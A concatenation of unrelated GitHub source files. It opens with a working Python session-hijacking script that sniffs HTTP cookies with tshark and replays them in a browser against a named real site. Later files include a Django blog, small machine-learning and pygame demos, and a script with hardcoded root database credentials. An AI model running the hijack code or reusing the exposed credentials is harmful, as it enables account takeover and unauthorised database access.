from selenium import webdriver
def eat_cookie():
    """Sniff an HTTP session cookie off the wire and replay it in a browser.

    Runs ``tshark`` to capture outgoing HTTP requests and print their Cookie
    headers, extracts a name/value pair via ``session_id_parser``, then opens
    Safari on wppt.pwr.edu.pl and swaps its PHPSESSID cookie for the captured
    one.  Requires tshark on PATH with capture privileges and Safari's
    WebDriver enabled.  (Security-lab demo of session hijacking.)
    """
    # tshark: line-buffered (-l), HTTP requests only, emit just the Cookie field.
    command = ['tshark', '-l', '-Y', 'http.request', '-T', 'fields', '-e', 'http.cookie']
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    # Shape expected by webdriver.add_cookie below.
    pattern = {'name': '', 'value': ''}
    while True:
        output = process.stdout.readline().decode('utf-8')
        if output == '' and process.poll() is not None:
            break  # capture process exited and its output is drained
        if output:
            cookie = session_id_parser.parse(output)
            # Keeps the LAST pair the parser yields — assumes that is the
            # session cookie; TODO confirm for multi-cookie headers.
            for key, value in cookie.items():
                pattern['name'] = key
                pattern['value'] = value
            if pattern['name'] != '' and pattern['value'] != '':
                print('Captured session ID: ', pattern['value'])
                break
    driver = webdriver.Safari(keep_alive=True)
    driver.get('http://wppt.pwr.edu.pl')
    print('Eating cookie with original session ID...')
    print(driver.get_cookie('PHPSESSID'))
    print('**OMM OMM OMM**')
    driver.delete_cookie('PHPSESSID')
    print('Replacing with captured session ID\n')
    driver.add_cookie(pattern)
    driver.refresh()
    print('New cookies: ')
    for cookie in driver.get_cookies():
        print(cookie)

eat_cookie()
|
[
"barchuckie@outlook.com"
] |
barchuckie@outlook.com
|
7840325068ccd87e7c2f362d380348e978ad66c6
|
3cabd0d64827d18e9befc84ea935b767d4c69f28
|
/server/bin/artery/link_login_role.py
|
f260bcf01d0544c34b553af208e72a6f16fa3dbd
|
[] |
no_license
|
minghuizhou/PAR
|
2b528a4e7230aee1eb0ee3cfd12852d54e250a0b
|
bf8ee49516879aede8c312aef2ddeab92ebe5d47
|
refs/heads/master
| 2016-09-08T05:08:07.556630
| 2015-09-12T15:16:39
| 2015-09-12T15:16:39
| 42,352,036
| 0
| 2
| null | 2015-10-22T13:49:30
| 2015-09-12T09:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
#!/usr/bin/python
# Author: Xie Jialiang
# Date: 2012-11-16
# Function: link login experience to link file
# Parameters: 1) llevel4_assigning
# 2) login role
# 3) name of who field
# 4) name of when field
# 5) prefix of output field
# Output stream: linked llevel4_assigning
import sys
import level3_lib as lib3
import leon_lib as lib
# 1) read login_role
# dictionary login -> [list of roles]
# Mapping: login name -> list of infopacks (role name + timestamp it took effect).
rolepacks = {}

def read_role_body(header, raw, curline):
    # Parse one row of the login->role file (Python 2 source) and record
    # that login's role history in `rolepacks`.
    login = raw[header['who']]
    # Roles are a tsep-separated list; each entry is "role<fsep>timestamp".
    raw_role = raw[header['role']].split(lib.tsep)
    roles = []
    for str_role in raw_role:
        if str_role == '':
            break  # trailing separator marks end of the list
        # NOTE(review): rebinds the outer `raw_role` name — harmless here
        # since the iterator was already created, but confusing.
        raw_role = str_role.split(lib.fsep)
        newpack = lib.infopack()
        newpack.data = raw_role[0]        # role name
        newpack.when = int(raw_role[1])   # timestamp the role took effect
        roles.append(newpack)
    rolepacks[login] = roles

# sys.argv[2]: the login-role file; no header processing needed.
lib.read_file(sys.argv[2], lib.empty_header, read_role_body)
# 2) link to level4_assigning
def link_header(header, raw, curline):
    # Echo the header line with a new "<prefix>_role" column appended
    # (prefix comes from argv[5]); curline keeps its trailing newline,
    # hence the [:-1] slice.
    print curline[:-1] + lib.sep + sys.argv[5] + '_role'

def link_body(header, raw, curline):
    # For each assignment row, look up the role the login held at time
    # `when` (who/when field names come from argv[3]/argv[4]).
    login = raw[header[sys.argv[3]]]
    when = int(raw[header[sys.argv[4]]])
    # no one should remain 'unknow'
    role = 'unknow'
    if rolepacks.has_key(login):  # Python 2 idiom; `login in rolepacks` elsewhere
        # Binary search the login's role history for the entry active at `when`.
        index = lib.binary_search(rolepacks[login], lib.func_time, when)
        if index >= 0:
            role = rolepacks[login][index].data
    print curline[:-1] + lib.sep + str(role)

# sys.argv[1]: the llevel4_assigning file; emits it with the role column added.
lib.read_file(sys.argv[1], link_header, link_body)
|
[
"zhmh@pku.edu.cn"
] |
zhmh@pku.edu.cn
|
b142a614f33910b10f5bfcc72d387e9e9ffb65db
|
722b34eb41b5d22962fd56b5c9c795f8088dabda
|
/mysite/settings.py
|
8e06fb3d5a0395575971c22f829ac864a9b08c36
|
[] |
no_license
|
gabritejedor/djangogirls
|
fd82b8f3ac379ef7290cf4c9053f79465616d9a7
|
42eb45de355b993f120874e247169f740e41ba79
|
refs/heads/master
| 2022-12-14T15:49:09.044452
| 2020-09-09T12:11:20
| 2020-09-09T12:11:20
| 294,012,917
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,208
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.16.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3wd)&=ndlc^dv-xs(07g3-bm+(=iv4^9tk8uvuwet6-f@&w@!j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog.apps.BlogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-es'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"tejedor.gabriel@gmail.com"
] |
tejedor.gabriel@gmail.com
|
64d5c91a43affc005fb4ff69a7c265cf050a0706
|
fe352d7f2ff89a8f71dedc0728a8e0f8cfd00c82
|
/example001.py
|
661d5148f4b2e1284abe73cee277c28228f2020c
|
[] |
no_license
|
fenwk0/Decorating
|
57c102ef67bf64baa46ab6983f797ec5d565fc0c
|
59745956ca60329b6a35fefd0813e10dfa33e0f3
|
refs/heads/master
| 2020-12-30T17:10:51.627879
| 2017-05-17T06:42:42
| 2017-05-17T06:42:42
| 91,061,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
import timeit
__author__ = 'fenwk0'
# This is our decorator
# taken from
# https://ains.co/blog/things-which-arent-magic-flask-part-1.html
# see also
# https://www.thecodeship.com/patterns/guide-to-python-function-decorators/
def time_decorator(f):
# This is the new function we're going to return
# This function will be used in place of our original definition
def wrapper():
start = timeit.default_timer()
print("Start Time: ", start)
f()
print("Time taken: ", timeit.default_timer() - start)
return wrapper
def simple_decorator(f):
# This is the new function we're going to return
# This function will be used in place of our original definition
def wrapper():
print("Entering Function")
f()
print("Exited Function")
return wrapper
@time_decorator
@simple_decorator
def hello():
print("Hello World")
hello()
|
[
"noreply@github.com"
] |
fenwk0.noreply@github.com
|
d5b114437ecf22f7655de0f685b1515689fa6a50
|
1b6e8a45af2328bac9fb5efe9d9706165b3e477f
|
/HelloPsych/vline/templatetags/.svn/text-base/vline_tags.py.svn-base
|
d431062c6a5a6e96cb596f3c62bc8ff87ad3bfa0
|
[] |
no_license
|
abbhinavvenkat/HelloPsych
|
e6b247fb15a9877660b243bc06535ff73011fcb4
|
5b3c7a84c00e70cf903cd7a5c254660139b454e2
|
refs/heads/master
| 2021-01-10T20:43:29.795597
| 2014-12-29T17:20:43
| 2014-12-29T17:20:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
from django import template
from .. import vline
import json
def vline_service_id():
return "'" + vline.SERVICE_ID + "'"
def vline_auth_token(user):
return "'" + vline.create_auth_token(user.id) + "'"
def vline_user_profile(user):
return json.dumps(vline.create_user_profile(user))
register = template.Library()
register.simple_tag(vline_service_id)
register.filter("vline_auth_token", vline_auth_token)
register.filter("vline_user_profile", vline_user_profile)
|
[
"abbhinavvenkat@gmail.com"
] |
abbhinavvenkat@gmail.com
|
|
07fbce72a887e82a1502046c7d5fe3a245a181f4
|
76119dbd4710437f7189013e615cb403f388ad60
|
/a_star/graph.py
|
bef1f52e267b8d480a7820c98fe60e99765bd408
|
[] |
no_license
|
joao1pedro/IA
|
855251c5ecb27ee1a746eafa71959dcbc26a569e
|
a42a08494c1824b8f7088f4572f21b965c706584
|
refs/heads/main
| 2023-04-19T11:34:21.463776
| 2021-05-10T19:40:29
| 2021-05-10T19:40:29
| 366,155,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
from vertex import *
class Graph:
def __init__(self):
self.camp = {}
def addVertex(self, city, value):
vertex = Vertex(city, value)
self.camp[city] = vertex
def addEdge(self, city_a, city_b, distance, value_a=0, value_b=0):
if city_a not in self.camp:
self.addVertex(city_a, value_a)
if city_b not in self.camp:
self.addVertex(city_b, value_b)
self.camp[city_a].addNeighbor(city_b, distance)
self.camp[city_b].addNeighbor(city_a, distance)
def getVertices(self):
return self.camp.keys()
def getNeighbors(self, city):
return self.camp[city].neighbors()
def getCost(self, city):
return self.camp[city].costValue()
def getEdges(self, city):
return self.camp[city].edges()
|
[
"jpedro@alu.ufc.br"
] |
jpedro@alu.ufc.br
|
efa3eef31d0a62564b9ce9cdf6b6a9aec5e41cf9
|
c7b5e983e8d831a39063698d700478eff37653e9
|
/listings/models.py
|
e102e6a623b8a88b2f7faa2f9c9dc0fa73ecaa72
|
[] |
no_license
|
Luis846/monsters-rolodex
|
86a0654700908d602401f0780fac2116e84f7e11
|
85537167410d5316429512f437c255246b0c3d11
|
refs/heads/master
| 2020-12-26T23:56:34.387150
| 2020-02-02T00:17:04
| 2020-02-02T00:17:04
| 237,694,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,438
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"luis.rivera846@gmail.com"
] |
luis.rivera846@gmail.com
|
61bcac812f0c491d1329ba7acc050ea1dfd83062
|
2d49a4926e71b958256fa76d238daf8bf31d33c9
|
/Hero2Vector/utils/prepare_data.py
|
022393e1bd157c44fcd817c81ae9455f98b278d4
|
[
"MIT"
] |
permissive
|
diorw/dota_analyze_and_prediction
|
d4a748328965d632ae86168ccfab65d6862f7ddc
|
3f5a6f21ba74fe065bbb5cc2fa8f512986023249
|
refs/heads/master
| 2020-12-19T18:17:19.049147
| 2020-05-25T08:36:08
| 2020-05-25T08:36:08
| 235,811,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,378
|
py
|
import pymysql
import json
import pandas as pd
conn = pymysql.connect(host = '120.55.167.182',user = 'root',password = 'wda20190707',database = 'dota')
cursor = conn.cursor()
sql = '''
select player_1_hero_id,player_2_hero_id,player_3_hero_id,
player_4_hero_id,player_5_hero_id,player_6_hero_id,player_7_hero_id
,player_8_hero_id,player_9_hero_id,player_10_hero_id,win
from dota.`match`
where game_mode = 22 or game_mode = 3
'''
cursor.execute(sql)
match_data = cursor.fetchall()
match_data = list(match_data)
match_data = list(map(list,match_data))
match_df = pd.DataFrame(match_data)
columns = []
for i in range(1,11):
columns.append("player_"+str(i)+"_hero_id")
columns.append("target")
match_df.columns = columns
hero_stats = pd.read_csv("../input/hero_stats.csv")
print(hero_stats.columns)
kz,hx,fz,ts,bf,xs,nj,tj = {},{},{},{},{},{},{},{}
for index,row in hero_stats.iterrows():
kz[row['id']] = row['kong_zhi']
hx[row['id']] = row['he_xin']
fz[row['id']] = row['fu_zhu']
ts[row['id']] = row['tao_sheng']
bf[row['id']] = row['bao_fa']
xs[row['id']] = row['xian_shou']
nj[row['id']] = row['nai_jiu']
tj[row['id']] = row['tui_jin']
for i in range(8):
match_df['radiant_$' + str(i)] = 0
match_df['dire_$' + str(i)] = 0
print(match_df.head(5))
j = 0
for dic in kz,hx,fz,ts,bf,xs,nj,tj:
# 产生8*2列 夜宴天辉分别8列
for i in range(5):
#print(match_df['radiant_$'+str(j)])
match_df['radiant_$'+str(j)] = match_df['radiant_$'+str(j)]+match_df["player_" + str(i + 1) + "_hero_id"].apply(lambda x: int(dic[int(x)]))
for i in range(5,10):
#print(match_df['dire_$' + str(j)])
match_df['dire_$' + str(j)] = match_df['dire_$' + str(j)]+match_df["player_" + str(i + 1) + "_hero_id"].apply(lambda x: int(dic[int(x)]))
j = j + 1
print(match_df.head(5))
#
#
match_df.to_csv("../input/temp.csv")
# with open("E://dota_prediction//Hero2vecModel-master//Hero2vecModel-master//input//id_to_heroname.json","r") as fp:
# id2heroname = json.load(fp)
# print(id2heroname)
# print(match_df.columns)
# for col in match_df.columns:
# if(col!="target"):
# print(match_df[col])
# match_df[col] = match_df[col].apply(lambda x:id2heroname[str(x)])
# print(match_df[col])
# match_df.to_csv("match.csv",encoding="utf8")
|
[
"406714601@qq.com"
] |
406714601@qq.com
|
607964a9ba93205db1311061e4de8f926aede1d4
|
7d242bae938def0417383a65222a5e32ef9972a9
|
/seed.py
|
cddd698a304c2ae896d8d11b8c5521128f14dce1
|
[] |
no_license
|
fan777/flask-feedback
|
1050ea18e24d3d219e35e9373ea619182873f59e
|
1edefa1e8f9821dbae751317ec50cd781c62f333
|
refs/heads/main
| 2023-04-16T15:43:06.022921
| 2021-04-23T20:58:59
| 2021-04-23T20:58:59
| 356,971,920
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
from app import db
from models import User, Feedback
db.drop_all()
db.create_all()
u1 = User.register('test', 'password', 'test@test.com', 'first', 'last')
u2 = User.register('cfan', 'password', 'cfan@test.com', 'charlie', 'fan')
u3 = User.register('jen', 'password', 'jen@test.com', 'jennifer', 'fan')
u4 = User.register('jerry', 'password', 'jerry@test.com', 'jerry', 'fan')
f1 = Feedback(title='title1', content='content1', username='test')
f2 = Feedback(title='title2', content='content2', username='test')
f3 = Feedback(title='title3', content='content3', username='test')
f4 = Feedback(title='title of feedback',
content='content is king', username='cfan')
db.session.add_all([u1, u2, u3, u4])
db.session.commit()
db.session.add_all([f1, f2, f3, f4])
db.session.commit()
|
[
"fan777@gmail.com"
] |
fan777@gmail.com
|
9feb322d92fc61c6492ea50a0f8ab033502c1e49
|
ccf5405798a32ffeb376125a27ce6795ecb5322e
|
/selector/admin.py
|
2c6c4590e3c41ea58ccb5080b925370718d9c86c
|
[] |
no_license
|
nicksunday/gamefinder
|
3d7591d72893d8121a860661f266251013da8aac
|
6bfad18998dce3413c67a7eb6ecb0940b8d67538
|
refs/heads/master
| 2022-12-25T13:52:02.385632
| 2020-09-28T19:59:03
| 2020-09-28T19:59:03
| 296,515,048
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
from django.contrib import admin
from .models import Artists, Categories, Designers, Families, GameArtists, GameCategories, GameDesigners, GameFamilies, GameMechanics, GamePublishers, GameSubdomains, Games, Mechanics, Publishers, Subdomains
# Register your models here.
#admin.site.register(Artists)
#admin.site.register(Categories)
#admin.site.register(Designers)
#admin.site.register(Families)
#admin.site.register(GameArtists)
#admin.site.register(GameCategories)
#admin.site.register(GameDesigners)
#admin.site.register(GameFamilies)
#admin.site.register(GameMechanics)
#admin.site.register(GamePublishers)
#admin.site.register(GameSubdomains)
#admin.site.register(Games)
#admin.site.register(Mechanics)
#admin.site.register(Publishers)
#admin.site.register(Subdomains)
@admin.register(Artists)
class ArtistsAdmin(admin.ModelAdmin):
list_display = ('name',)
@admin.register(Categories)
class CategoriesAdmin(admin.ModelAdmin):
list_display = ('category',)
@admin.register(Designers)
class DesignersAdmin(admin.ModelAdmin):
list_display = ('designer',)
@admin.register(Families)
class FamiliesAdmin(admin.ModelAdmin):
list_display = ('family',)
@admin.register(GameArtists)
class GameArtistsAdmin(admin.ModelAdmin):
pass
@admin.register(GameCategories)
class GameCategoriesAdmin(admin.ModelAdmin):
pass
@admin.register(GameDesigners)
class GameDesignersAdmin(admin.ModelAdmin):
pass
@admin.register(GameFamilies)
class GameFamiliesAdmin(admin.ModelAdmin):
pass
@admin.register(GameMechanics)
class GameMechanicsAdmin(admin.ModelAdmin):
pass
@admin.register(GamePublishers)
class GamePublishersAdmin(admin.ModelAdmin):
pass
@admin.register(GameSubdomains)
class GameSubdomainsAdmin(admin.ModelAdmin):
pass
@admin.register(Games)
class GamesAdmin(admin.ModelAdmin):
list_display = ('name', 'average', 'minplayers', 'maxplayers', 'thumbnail')
list_filter = ('minplayers', 'maxplayers')
@admin.register(Mechanics)
class MechanicsAdmin(admin.ModelAdmin):
pass
@admin.register(Publishers)
class PublishersAdmin(admin.ModelAdmin):
pass
@admin.register(Subdomains)
class SubdomainsAdmin(admin.ModelAdmin):
pass
|
[
"sunday.nick@gmail.com"
] |
sunday.nick@gmail.com
|
c50a342acb6bc87b8a8f688c00e2d4ed0b1e549d
|
758f8908c777bfbecaf29f7586f0f6431f272cfa
|
/SciLearn/logisticregression.py
|
28438a3291fa90d6dc77d314c73c319428b0ac82
|
[] |
no_license
|
andyxiao24/sklearnlearn
|
677c79be17813ee717d5f1518f2890642f06c55a
|
35cfe6fb312cb9ba17b45c83c3c1b32c970784f7
|
refs/heads/master
| 2020-03-31T12:34:30.618113
| 2018-10-18T09:20:49
| 2018-10-18T09:20:49
| 152,221,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
print(__doc__)
# Code source: Gael Varoquaux
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
# General a toy dataset:s it's just a straight line with some Gaussian noise:
xmin, xmax = -5, 5
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
y = (X > 0).astype(np.float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
# Fit the classifier
clf = linear_model.LogisticRegression(C=1e5, solver='lbfgs')
clf.fit(X, y)
# and plot the result
plt.figure(1, figsize=(4, 3))
plt.clf()
plt.scatter(X.ravel(), y, color='black', zorder=20)
X_test = np.linspace(-5, 10, 300)
def model(x):
return 1 / (1 + np.exp(-x))
loss = model(X_test * clf.coef_ + clf.intercept_).ravel()
plt.plot(X_test, loss, color='red', linewidth=3)
ols = linear_model.LinearRegression()
ols.fit(X, y)
plt.plot(X_test, ols.coef_ * X_test + ols.intercept_, linewidth=1)
plt.axhline(.5, color='.5')
plt.ylabel('y')
plt.xlabel('X')
plt.xticks(range(-5, 10))
plt.yticks([0, 0.5, 1])
plt.ylim(-.25, 1.25)
plt.xlim(-4, 10)
plt.legend(('Logistic Regression Model', 'Linear Regression Model'),
loc="lower right", fontsize='small')
plt.tight_layout()
plt.show()
|
[
"xp373150@163.com"
] |
xp373150@163.com
|
a602f9773fece56e8bf5673f94bbf685cd12f67b
|
20dcfdc70daa62a6886c8717bb4052177098d830
|
/blog/migrations/0001_initial.py
|
3f7f01efffe4692656cbda4e4ddb286bcd5eff1c
|
[] |
no_license
|
15179711268/student_sys
|
71f92e6f483e62fb3c46c0424bff794abfb692f6
|
a2ef88c65273b3a2a0d15a06371a42bf17ab6306
|
refs/heads/master
| 2020-12-02T02:52:55.055579
| 2020-01-02T09:44:51
| 2020-01-02T09:44:51
| 230,863,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,356
|
py
|
# Generated by Django 3.0.1 on 2019-12-31 08:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='名称')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
('is_nav', models.BooleanField(default=False, verbose_name='是否为导航')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
],
options={
'verbose_name': '分类',
'verbose_name_plural': '分类',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=10, verbose_name='名称')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
],
options={
'verbose_name': '标签',
'verbose_name_plural': '标签',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='标题')),
('desc', models.CharField(blank=True, max_length=1024, verbose_name='摘要')),
('content', models.TextField(help_text='正文必须为MarkDown格式', verbose_name='正文')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除'), (2, '草稿')], default=1, verbose_name='状态')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='blog.Category', verbose_name='分类')),
('ower', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
('tag', models.ManyToManyField(to='blog.Tag', verbose_name='标签')),
],
options={
'verbose_name': '文章',
'verbose_name_plural': '文章',
'ordering': ['-id'],
},
),
]
|
[
"1336278145@qq.com"
] |
1336278145@qq.com
|
65775a3e57d9d65d42dd32185860bd1e5c3434c6
|
f193f4032a3b710b8ee8cc9dab6b8763d3fa85ba
|
/easyX.py
|
92b49d05a65069bb9d1953325c6865ee8ea2b56e
|
[] |
no_license
|
Ameema-Arif/Jigsaw-Puzzle-using-Python
|
171421e2ae74a61cbc6d9240894aee9636c73170
|
f6f737dfc992f99f73193acf26b5e5fec8e9f0e4
|
refs/heads/master
| 2023-02-06T17:30:48.176999
| 2023-01-31T15:15:54
| 2023-01-31T15:15:54
| 248,823,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,498
|
py
|
import pygame as p
import time
from tkinter import *
import sys
class Puzzle(object):
Sound=r"D:\OOP\Project\SubMusic.ogg"
def Win(self):
p.init()
Wint=p.display.set_mode((400,400))
p.display.set_caption("Game Over")
Wimg=p.image.load(r"D:\OOP\Project\game-result-win.png").convert()
Wimg=p.transform.scale(Wimg,(400,400))
Wint.blit(Wimg,[10,10])
p.display.update()
time.sleep(2)
def Lose(self):
p.init()
Lint=p.display.set_mode((400,400))
p.display.set_caption("Game Over")
Limg=p.image.load(r"D:\OOP\Project\you-lose1.png").convert()
Limg=p.transform.scale(Limg,(400,400))
Lint.blit(Limg,[10,10])
p.display.update()
time.sleep(1)
def Sound(self):
p.mixer.init()
p.mixer.music.load("D:\OOP\Project\SubMusic.ogg")
p.mixer.music.play()
class Easy(Puzzle):
x=p.init()
screen=p.display.set_mode((500,400))
z=p.display.set_caption("Jigsaw puzzle")
Puzzle.Sound(X)
first=p.image.load(r"D:\OOP\Project\looneytunes1.png").convert()
second=p.image.load(r"D:\OOP\Project\looneytunes2.png").convert()
third=p.image.load(r"D:\OOP\Project\looneytunes3.png").convert()
fourth=p.image.load(r"D:\OOP\Project\looneytunes4.png").convert()
first=p.transform.scale(first,(150,150))
second=p.transform.scale(second,(150,150))
third=p.transform.scale(third,(150,150))
fourth=p.transform.scale(fourth,(150,150))
p.mouse.set_visible(True)
done=False
a,b=0,0
c,d=152,0
e,f=0,152
g,h=152,152
L=[]
m=[]
def Win(self):
Puzzle.Win(self)
def Lose(self):
Puzzle.Lose(self)
for event in p.event.get():
screen.blit(first,[a,b])
screen.blit(second,[c,d])
screen.blit(third,[e,f])
screen.blit(fourth,[g,h])
#*********************************Game loop**************************************************************************************************
while done==False:
for event in p.event.get():
screen.blit(fourth,[a,b])
screen.blit(third,[c,d])
screen.blit(second,[e,f])
screen.blit(first,[g,h])
mx,my=p.mouse.get_pos()
#First
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if mx<=150 and 0<= my <=150:
L.append([150,0,150])
#second
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if 152<= mx <=302 and my<=150:
L.append([152,302,150])
#Third
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if mx <=152 and 152<= my<=302:
L.append([152,152,302])
#Fourth
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if 152<= mx <=302 and 152<= my<=302:
L.append([152,302,152,302])
# *********************************************************First**************************************************************************
#T1->T2
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,150]):
print("X")
if a==0 and b==0 and c==152 and d==0:
a=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
print("X")
if a==152 and b==0 and e==0 and f==152:
a=0
b=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and e==152 and f==0:
a=152
b=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==0 and g==152 and h==152:
b=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==152 and h==0:
b=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,150]):
print("X")
if a==152 and b==0 and c==0 and d==0:
a=0
b=0
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,152,302]):
print("X")
if a==0 and b==0 and e==0 and f==152:
b=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and c==152 and d==0:
a=152
b=0
c=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2>T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
